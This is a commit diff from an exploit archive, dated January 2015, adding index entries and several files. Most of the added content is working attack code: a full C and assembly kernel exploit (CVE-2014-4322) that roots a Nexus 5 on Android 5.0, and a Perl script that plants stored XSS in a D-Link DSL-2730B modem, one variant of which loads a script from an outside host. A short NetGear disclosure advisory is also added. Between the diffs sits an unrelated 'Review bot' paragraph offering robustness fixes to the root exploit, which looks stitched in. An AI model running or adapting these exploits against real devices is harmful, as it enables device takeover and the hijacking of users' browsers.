Update: 2015-01-19
16 new exploits
This commit is contained in:
parent
7bb980404f
commit
77291f0ca3
17 changed files with 2130 additions and 0 deletions
16
files.csv
|
@ -32170,6 +32170,7 @@ id,file,description,date,author,platform,type,port
|
|||
35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0
|
||||
35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0
|
||||
35710,platforms/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,php,webapps,80
|
||||
35711,platforms/android/local/35711.c,"Nexus 5 Android 5.0 - Local Root Exploit",2015-01-06,retme,android,local,0
|
||||
35712,platforms/windows/local/35712.rb,"BulletProof FTP Client BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0
|
||||
35713,platforms/php/webapps/35713.txt,"FestOS 2.3c 'upload.php' Arbitrary File Upload Vulnerability",2011-05-08,KedAns-Dz,php,webapps,0
|
||||
35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 '.bvp' File Stack-Based Buffer Overflow Vulnerability",2011-05-09,KedAns-Dz,windows,remote,0
|
||||
|
@ -32191,6 +32192,7 @@ id,file,description,date,author,platform,type,port
|
|||
35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80
|
||||
35731,platforms/php/remote/35731.rb,"Pandora v3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80
|
||||
35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
|
||||
35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS",2015-01-09,Dave,php,webapps,80
|
||||
35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
|
||||
35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
|
||||
35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -32198,13 +32200,17 @@ id,file,description,date,author,platform,type,port
|
|||
35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0
|
||||
35739,platforms/php/webapps/35739.txt,"Argyle Social Multiple Cross Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0
|
||||
35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler Optimization NULL String Remote Code Execution Vulnerability",2011-03-04,"Brian Mancini",windows,remote,0
|
||||
35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0
|
||||
35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0
|
||||
35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-05-13,MustLive,multiple,webapps,0
|
||||
35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 '.au' File Remote Buffer Overflow Vulnerability",2011-05-16,KedAns-Dz,windows,remote,0
|
||||
35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Vulnerability",2011-05-16,KedAns-Dz,php,webapps,0
|
||||
35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ?sfan55",linux,local,0
|
||||
35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"Mauricio Correa",hardware,webapps,0
|
||||
35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)",2015-01-11,prdelka,linux,local,0
|
||||
35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app)",2015-01-11,RichardG,linux,local,0
|
||||
35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit DnsProxy.cmd",2015-01-11,"Mauricio Correa",hardware,webapps,0
|
||||
35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"Mauricio Correa",hardware,webapps,0
|
||||
35752,platforms/php/webapps/35752.txt,"Mambo 'com_docman' 1.3.0 Component Multiple SQL Injection Vulnerabilities",2011-05-16,KedAns-Dz,php,webapps,0
|
||||
35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon Denial Of Service Vulnerability",2011-05-16,Knud,multiple,dos,0
|
||||
35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 'login/login.php' Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
|
||||
|
@ -32244,6 +32250,8 @@ id,file,description,date,author,platform,type,port
|
|||
35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x Memory Corruption Vulnerability",2011-05-24,"Andy Davis",multiple,remote,0
|
||||
35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 'ajax-chat.php' Cross Site Scripting Vulnerability",2011-05-24,"High-Tech Bridge SA",php,webapps,0
|
||||
35792,platforms/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting Vulnerability",2011-05-24,"Kacper Szczesniak",multiple,remote,0
|
||||
35793,platforms/win32/shellcode/35793.txt,"Obfuscated Shellcode Windows x86 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service",2015-01-13,"Ali Razmjoo",win32,shellcode,0
|
||||
35794,platforms/win64/shellcode/35794.txt,"Obfuscated Shellcode Windows x64 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service",2015-01-13,"Ali Razmjoo",win64,shellcode,0
|
||||
35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-25,KedAns-Dz,php,webapps,0
|
||||
35797,platforms/php/webapps/35797.txt,"Joomla! 'com_shop' Component SQL Injection Vulnerability",2011-05-25,"ThunDEr HeaD",php,webapps,0
|
||||
35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 '_kurl' Parameter Cross Site Scripting Vulnerability",2011-05-25,"AutoSec Tools",php,webapps,0
|
||||
|
@ -32252,9 +32260,17 @@ id,file,description,date,author,platform,type,port
|
|||
35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4 1 SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0
|
||||
35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 'keywordraw' Parameter Cross Site Scripting Vulnerability",2011-05-25,"Matt Jezorek",cgi,webapps,0
|
||||
35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 Multiple SQL Injection Vulnerabilities",2011-05-30,KedAns-Dz,php,webapps,0
|
||||
35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 'libnvbasics.dll' Remote Denial of Service Vulnerability",2011-05-28,"Luigi Auriemma",windows,dos,0
|
||||
35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 Remote Code Execution Vulnerability",2011-05-28,"Kacper Szczesniak",multiple,remote,0
|
||||
35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 Unspecified Remote Buffer Overflow Vulnerability",2011-05-27,"Kevin R.V",windows,remote,0
|
||||
35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 'userContextMenu_parameter' Parameter Cross Site Scripting Vulnerability",2011-05-31,LiquidWorm,asp,webapps,0
|
||||
35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 'index.php' Cross Site Scripting Vulnerability",2011-05-31,"Stefan Schurtz",php,webapps,0
|
||||
35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-05-31,Kalashinkov3,windows,remote,0
|
||||
35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0
|
||||
35814,platforms/php/webapps/35814.txt,"TEDE Simplificado v1.01/vS2.04 Multiple SQL Injection Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
|
||||
35815,platforms/php/webapps/35815.pl,"PikaCMS Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
|
||||
35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-06-01,"High-Tech Bridge SA",php,webapps,0
|
||||
35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0
|
||||
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
|
||||
35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
|
||||
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
|
||||
|
|
|
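--- a/platforms/android/local/35711.c
+++ b/platforms/android/local/35711.c
@@ -0,0 +1,552 @@
+/*
+* CVE-2014-4322 exploit for Nexus Android 5.0
+*
+* author: retme retme7@gmail.com
+* website: retme.net
+*
+* The exploit must be excuted as system privilege and specific SELinux context.
+* If exploit successed,you will gain root privilege and "kernel" SELinux context
+*
+* bug info:
+* https://www.codeaurora.org/projects/security-advisories/memory-corruption-qseecom-driver-cve-2014-4322
+*
+* how to build:
+*
+create an Android.mk as follow:
+
+include $(CLEAR_VARS)
+include $(CLEAR_VARS)
+LOCAL_SRC_FILES:= ./msm.c \
+./shellcode.S
+
+LOCAL_MODULE:= exploit
+#LOCAL_C_INCLUDES += $(common_includes)
+LOCAL_CPPFLAGS += -DDEBUG
+LOCAL_CFLAGS += -DDEBUG
+LOCAL_LDLIBS += -L$(SYSROOT)/usr/lib -llog
+
+include $(BUILD_EXECUTABLE)
+include $(BUILD_EXECUTABLE)
+
+create Application.mk as follow:
+
+APP_ABI := armeabi
+APP_PLATFORM := android-8
+APP_PIE:= true
+
+use ndk-build to build the project
+
+usage:
+
+run exploit as system privilege,with SELinux context such as "keystore","vold","drmserver","mediaserver","surfaceflinger"
+*
+* If exploit successed,you will gain root privilege and "kernel" SELinux context
+*
+*
+* */
+//=========================================msm.c=============================================
+#include <string.h>
+#include <jni.h>
+#include <android/log.h>
+#include <pthread.h>
+#include <sys/prctl.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <asm/ptrace.h>
+#include <asm/user.h>
+#include <asm/ptrace.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <dlfcn.h>
+#include <dirent.h>
+#include <unistd.h>
+#include <linux/elf.h>
+#include <linux/reboot.h>
+#include <errno.h>
+#include <dlfcn.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/mount.h>
+#include <linux/ptrace.h>
+#include <linux/prctl.h>
+#include <sys/system_properties.h>
+#include <errno.h>
+#include <termios.h>
+#include <sys/syscall.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <errno.h>
+#include <linux/ion.h>
+
+#include "../kernel.h"
+#include "qseecom.h"
+
+//4.4.2 CFW(for debug)
+//#define PTMX_FOPS 0xc1334e00
+//fnPrintk printk = 0xc0a0113c;
+
+//Nexus Android 5.0 OFW
+#define PTMX_DEVICE "/dev/ptmx"
+#define PTMX_FOPS 0xc1236cd8
+fnPrintk printk = 0xc0a21e78;
+
+int MyCommitCred(int ruid, int rgid, signed int a3, int isSelinux);
+
+int kmemcmp(char *a1, char *a2, int len)
+{
+int v3; // r3@2
+int v4; // r4@3
+int v5; // r5@3
+int result; // r0@4
+
+if ( len )
+{
+v3 = 0;
+while ( 1 )
+{
+v4 = a1[v3];
+v5 = a2[v3];
+if ( v4 != v5 )
+break;
+if ( a1[v3] )
+{
+++v3;
+if ( len != v3 )
+continue;
+}
+goto LABEL_7;
+}
+result = v4 - v5;
+}
+else
+{
+LABEL_7:
+result = 0;
+}
+return result;
+}
+
+int g_pid = 0;
+int g_tgid = 0;
+
+
+
+int open_ion(){
+int fd = open("/dev/ion",O_RDONLY);
+if (fd<0){
+perror("open");
+}
+printf("ion fd %d\n",fd);
+return fd;
+}
+
+
+// http://lwn.net/Articles/480055/
+
+/*
+* struct ion_allocation_data {
+size_t len;
+size_t align;
+unsigned int heap_mask;
+unsigned int flags;
+struct ion_handle *handle;
+};
+*
+*
+* */
+#define ION_FLAG_SECURE (1<<31)
+
+int alloc_ion_memory(int client_fd,int size,struct ion_handle** pphandle){
+int ret = -1;
+
+struct ion_allocation_data data;
+
+// ION_FLAG_CACHED
+data.len = size;
+data.align = size;
+data.flags = ION_HEAP_TYPE_CARVEOUT ;
+//data.heap_mask = ION_HEAP_TYPE_CARVEOUT;
+//data.handle = handle;
+
+ret = ioctl(client_fd, ION_IOC_ALLOC, &data);
+if (ret<0){
+perror("ION_IOC_ALLOC");
+}
+*pphandle = data.handle;
+return ret;
+
+}
+/*
+struct ion_fd_data {
+struct ion_handle *handle;
+int fd;
+}
+*/
+int share_ion_memory(int client_fd,struct ion_handle* handle){
+struct ion_fd_data data;
+data.handle = handle;
+data.fd = -1;
+
+int ret = ioctl(client_fd, ION_IOC_SHARE, &data);
+
+
+return data.fd;
+
+}
+
+
+
+
+int obtain_dma_buf_fd(int size){
+int fd_device = open_ion();
+int dmf_fd = -1;
+
+struct ion_handle* handle;
+int ret = alloc_ion_memory(fd_device,size,&handle);
+if (ret<0){
+perror("alloc_ion_memory");
+}
+
+dmf_fd = share_ion_memory(fd_device,handle);
+
+if (dmf_fd<0){
+perror("share_ion_memory");
+}
+return dmf_fd;
+}
+
+
+void* fd_to_mmap(int fd,int size){
+
+
+void* seg_addr = mmap(0,
+size ,
+PROT_READ | PROT_WRITE,
+MAP_SHARED,
+fd,
+0);
+
+if(seg_addr == MAP_FAILED){
+perror("fd_to_map");
+}
+
+return seg_addr;
+}
+
+
+
+//c0a0113c T printk
+void sayhello(){
+fnPrintk printk = 0xc0a0113c;
+printk("hell0 shellocde");
+return;
+}
+
+void shell_code2();
+
+static int
+run_obtain_root_privilege()
+{
+int fd;
+int ret;
+
+fd = open(PTMX_DEVICE, O_WRONLY);
+if(fd<=0){perror("ptmx");return -1;}
+ret = fsync(fd);
+close(fd);
+
+return ret;
+}
+
+
+int main(int argc, char *argv[]){
+
+printf("mypid %d\n",getpid());
+int ret = -1;
+
+int fd = open("/dev/qseecom", 0);
+if (fd<0){
+perror("open");
+exit(-1);
+}
+
+void* abuseBuff = malloc(400);
+memset(abuseBuff,0,400);
+
+int* intArr = (int*)abuseBuff;
+int j = 0;
+
+for(j=0;j<24;j++){
+
+intArr[j] = 0x1;
+
+}
+
+
+struct qseecom_send_modfd_cmd_req ioctlBuff;
+
+prctl(PR_SET_NAME, "GodFather", 0, 0, 0);
+
+// if(0==fork()){
+
+g_pid = getpid();
+g_tgid = g_pid;
+prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);
+
+//QSEECOM_IOCTL_SET_MEM_PARAM_REQ
+struct qseecom_set_sb_mem_param_req req;
+req.ifd_data_fd = obtain_dma_buf_fd(8192);
+
+req.virt_sb_base = abuseBuff;
+req.sb_len = 8192;
+
+ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
+printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret);
+
+ioctlBuff.cmd_req_buf = abuseBuff;
+ioctlBuff.cmd_req_len = 400;
+ioctlBuff.resp_buf = abuseBuff;
+ioctlBuff.resp_len = 400;
+int i = 0;
+for (i = 0;i<4;i++){
+ioctlBuff.ifd_data[i].fd = 0;
+ioctlBuff.ifd_data[i].cmd_buf_offset =0;
+}
+ioctlBuff.ifd_data[0].fd = req.ifd_data_fd;
+ioctlBuff.ifd_data[0].cmd_buf_offset = 0;//(int)(0xc03f0ab4 + 8) - (int)abuseBuff;
+
+
+printf("QSEECOM_IOCTL_SEND_CMD_REQ");
+ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
+
+
+printf("return %p %p\n",intArr[0],intArr[1]);
+perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
+printf("ioctl return 0x%x \n",ret);
+
+//*(int*)intArr[0] = 0x0;
+void* addr = mmap(intArr[0],4096,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,-1,0);
+printf("mmap return %p \n",addr);
+
+*(int*)addr = 0xE3500000;
+*((int*)((int)addr+4)) = 0xe1a0f00e;
+memcpy(addr,shell_code2,400);
+
+int* arr = (int*)addr;
+for(i=0;i<10;i++){
+if(arr[i] == 0xeeeeeeee)
+arr[i] = (int)MyCommitCred;
+printf("%p\n",arr[i]);
+
+}
+
+//c1334e00 b ptmx_fops
+ioctlBuff.ifd_data[0].cmd_buf_offset = (int)(PTMX_FOPS + 14*4) - (int)abuseBuff;
+
+
+printf("QSEECOM_IOCTL_SEND_CMD_REQ");
+ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
+printf("return %p %p\n",intArr[0],intArr[1]);
+perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
+printf("ioctl return 0x%x \n",ret);
+
+
+run_obtain_root_privilege();
+
+
+char * argv1[]={"sh",(char *)0};
+int result = execv("/system/bin/sh", argv1);
+if(result){
+perror("execv");
+}
+
+return 0;
+
+
+}
+
+
+
+
+
+int MyCommitCred(int ruid, int rgid, signed int a3, int isSelinux)
+{
+
+int v38; // [sp+0h] [bp-60h]@1
+int addrBase;
+char szName[16] = "ihoo.darkytools";
+int offset;
+mycred *my_cred;
+mycred *my_real_cred;
+struct task_security_struct * tsec;
+int ret = -1;
+
+int searchLenth;
+
+isSelinux = 1;
+//return 0;
+addrBase = *(int*)(((int)(&v38) & 0xFFFFE000) + 0xC);
+//return addrBase;
+if ( addrBase > 0xBFFFFFFF )
+{
+
+offset = 0;
+while ( 1 )
+{
+addrBase += 4;
+if ( !kmemcmp(addrBase, szName, 16) )
+break;
+++offset;
+if ( offset == 0x600 )
+{
+return 18;
+}
+}
+}
+else
+return 17;
+
+my_cred = *(int*)(addrBase -8);
+my_real_cred = *(int*)(addrBase -8 - 4);
+
+
+searchLenth = 0;
+while(searchLenth<0x20){
+
+
+if(!my_cred || !my_real_cred
+|| my_cred<0xBFFFFFFF || my_real_cred<0xBFFFFFFF
+){
+//2.6?
+
+addrBase-=4;
+
+
+my_cred = *(int*)(addrBase-8 );
+my_real_cred = *(int*)(addrBase -8-4);
+
+}
+else
+break;
+
+searchLenth++;
+}
+
+if(searchLenth == 0x20)
+return 0X20;
+// fuck!! where is my cred???
+
+
+my_cred->uid = 0;
+my_cred->gid = 0;
+my_cred->suid = 0;
+my_cred->sgid = 0;
+my_cred->egid = 0;
+my_cred->euid = 0;
+my_cred->fsgid = 0;
+my_cred->fsuid = 0;
+my_cred->securebits=0;
+my_cred->cap_bset.cap[0] = -1;
+my_cred->cap_bset.cap[1] = -1;
+my_cred->cap_inheritable.cap[0] = -1;
+my_cred->cap_inheritable.cap[1] = -1;
+my_cred->cap_permitted.cap[0] = -1;
+my_cred->cap_permitted.cap[1] = -1;
+my_cred->cap_effective.cap[0] = -1;
+my_cred->cap_effective.cap[1] = -1;
+
+my_real_cred->uid = 0;
+my_real_cred->gid = 0;
+my_real_cred->suid = 0;
+my_real_cred->sgid = 0;
+my_real_cred->egid = 0;
+my_real_cred->euid = 0;
+my_real_cred->fsgid = 0;
+my_real_cred->fsuid = 0;
+my_real_cred->securebits=0;
+my_real_cred->cap_bset.cap[0] = -1;
+my_real_cred->cap_bset.cap[1] = -1;
+my_real_cred->cap_inheritable.cap[0] = -1;
+my_real_cred->cap_inheritable.cap[1] = -1;
+my_real_cred->cap_permitted.cap[0] = -1;
+my_real_cred->cap_permitted.cap[1] = -1;
+my_real_cred->cap_effective.cap[0] = -1;
+my_real_cred->cap_effective.cap[1] = -1;
+
+
+if(isSelinux){
+
+tsec = my_cred->security;
+
+if(tsec && tsec > 0xBFFFFFFF){
+tsec->sid = 1;
+tsec->exec_sid = 1;
+
+ret = 15;
+}
+else {
+tsec = (struct task_security_struct*)(*(int*)(0x10 + (int)&my_cred->security));
+
+if(tsec && tsec > 0xBFFFFFFF){
+tsec->sid = 1;
+tsec->exec_sid = 1;
+
+ret = 15;
+}
+}
+
+
+tsec = my_real_cred->security;
+
+if(tsec && tsec > 0xBFFFFFFF){
+tsec->sid = 1;
+tsec->exec_sid = 1;
+
+ret = 15;
+}else {
+tsec = (struct task_security_struct*)(*(int*)(0x10 + (int)&my_real_cred->security));
+
+if(tsec && tsec > 0xBFFFFFFF){
+tsec->sid = 1;
+tsec->exec_sid = 1;
+
+ret = 15;
+}
+}
+
+
+
+}
+else{
+ret = 16;
+}
+printk("return %d",ret);
+return ret;
+}
+//=========================================msm.c end=============================================
+//=========================================shellcode.S start=============================================
+#define __ASSEMBLY__
+#include <linux/linkage.h>
+
+.extern sayhello
+
+
+ENTRY(shell_code2)
+ldr r0, [pc , #4]
+STMFD SP!, {R0}
+LDMFD SP!, {PC}
+.byte 0xee, 0xee, 0xee, 0xee
+//=========================================shellcode.S end=============================================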
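Review bot: `share_ion_memory` stores the ION_IOC_SHARE ioctl result in `ret` but never examines it, so a failed share silently returns `data.fd`, and the caller's `perror("share_ion_memory")` in `obtain_dma_buf_fd` only triggers because `fd` was pre-set to -1; the failure should be reported where it happens, `if (ret < 0) { perror("ION_IOC_SHARE"); return -1; }`. The same log-and-continue pattern recurs in `obtain_dma_buf_fd`, which prints on an `alloc_ion_memory` failure and then passes the uninitialized `handle` on anyway, and in `fd_to_mmap`, which returns `MAP_FAILED` to callers after logging it; `obtain_dma_buf_fd` also never closes the descriptor from `open_ion`. Separately, `sayhello` shadows the file-level `printk` with the 4.4.2 debug address `0xc0a0113c` while the active definition at file scope is `0xc0a21e78`; the helper is never called from C but is still named by `.extern sayhello` in the assembly, so either drop the local redefinition or mark it as a debug leftover with a comment such as `/* debug-only: uses the 4.4.2 CFW printk, not the file-level one */`.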
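--- a/platforms/hardware/remote/35817.txt
+++ b/platforms/hardware/remote/35817.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/48085/info
+
+NetGear WNDAP350 wireless access point is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information.
+
+A remote attacker can exploit these issues to obtain sensitive information that can aid in launching further attacks.
+
+WNDAP350 with firmware 2.0.1 and 2.0.9 are vulnerable; other firmware versions may also be affected.
+
+http://www.example.com/downloadFile.php
+http://www.example.com/BackupConfig.php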
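--- a/platforms/hardware/webapps/35747.pl
+++ b/platforms/hardware/webapps/35747.pl
@@ -0,0 +1,137 @@
+# Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored
+# Date: 11-01-2015
+# Exploit Author: Mauricio Correa
+# Vendor Homepage: www.dlink.com
+# Hardware version: C1
+# Version: GE 1.01
+# Tested on: Windows 8 and Linux
+
+#!/usr/bin/perl
+#
+# Date dd-mm-aaaa: 11-11-2014
+# Exploit for D-Link DSL-2730B
+# Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl
+# Developed by Mauricio Corrêa
+# XLabs Information Security
+# WebSite: www.xlabs.com.br
+# More informations: www.xlabs.com.br/blog/?p=339
+#
+# CAUTION!
+# This exploit disables some features of the modem,
+# forcing the administrator of the device, accessing the page to reconfigure the modem again,
+# occurring script execution in the browser of internal network users.
+#
+# Use with caution!
+# Use at your own risk!
+#
+
+
+
+use strict;
+use warnings;
+use diagnostics;
+use LWP::UserAgent;
+use HTTP::Request;
+use URI::Escape;
+
+
+my $ip = $ARGV[0];
+my $user = $ARGV[1];
+my $pass = $ARGV[2];
+my $opt = $ARGV[3];
+$ip = $1 if($ip=~/(.*)\/$/);
+
+if (@ARGV != 4){
+
+print "\n";
+print "XLabs Information Security www.xlabs.com.br\n";
+print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
+print "Developed by Mauricio Correa\n";
+print "Contact: mauricio\@xlabs.com.br\n";
+print "Usage: perl $0 http:\/\/host_ip\/ user pass option\n";
+print "\n";
+print "Options: 1 - Parameter: wlAuthMode \n";
+print " 2 - Parameter: wl_wsc_reg \n ";
+print " 3 - Parameter: wl_wsc_mode \n";
+print " 4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \n";
+}else{
+
+print "XLabs Information Security www.xlabs.com.br\n";
+print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
+print "Developed by Mauricio Correa\n";
+print "Contact: mauricio\@xlabs.com.br\n";
+print "[+] Exploring $ip\/ ...\n";
+
+my $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
+my $ua = new LWP::UserAgent;
+my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
+$hdrs->authorization_basic($user, $pass);
+
+chomp($ip);
+
+print "[+] Preparing...\n";
+my $url_and_payload = "";
+
+if($opt == 1){
+$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=1$payload".
+"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
+}elsif($opt == 2){
+$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled$payload&wlAuth=0&wlAuthMode=997354".
+"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
+
+}elsif($opt == 3){
+
+$payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
+$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=997354".
+"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
+
+}elsif($opt == 4){
+
+$payload = "GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E";
+$url_and_payload = "$ip/wlsecurity.wl?wl_wsc_mode=enabled&wl_wsc_reg=disabled&wsc_config_state=0&wlAuthMode=psk%20psk2&wlAuth=0&".
+"wlWpaPsk=$payload&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=aes&wlKeyBit=0&wlPreauth=0&".
+"wlSsidIdx=0&wlSyncNvram=1";
+
+}else{
+
+print "[-] Chose one option!\n";
+exit;
+}
+
+my $req = new HTTP::Request("GET",$url_and_payload,$hdrs);
+
+print "[+] Prepared!\n";
+print "[+] Requesting...\n";
+my $resp = $ua->request($req);
+if ($resp->is_success){
+
+print "[+] Successfully Requested!\n";
+
+my $resposta = $resp->as_string;
+
+print "[+] Checking for properly explored...\n";
+my $url = "$ip/wlsecurity.html";
+$req = new HTTP::Request("GET",$url,$hdrs);
+
+print "[+] Checking that was explored...\n";
+
+my $resp2 = $ua->request($req);
+
+if ($resp2->is_success){
+my $result = $resp2->as_string;
+if($opt == 4){
+$payload = "%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27";
+}
+
+if(index($result, uri_unescape($payload)) != -1){
+print "[+] Successfully Exploited!";
+}else{
+print "[-] Not Exploited!";
+}
+}
+}else {
+
+print "[-] Ops!\n";
+print $resp->message;
+}
+}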
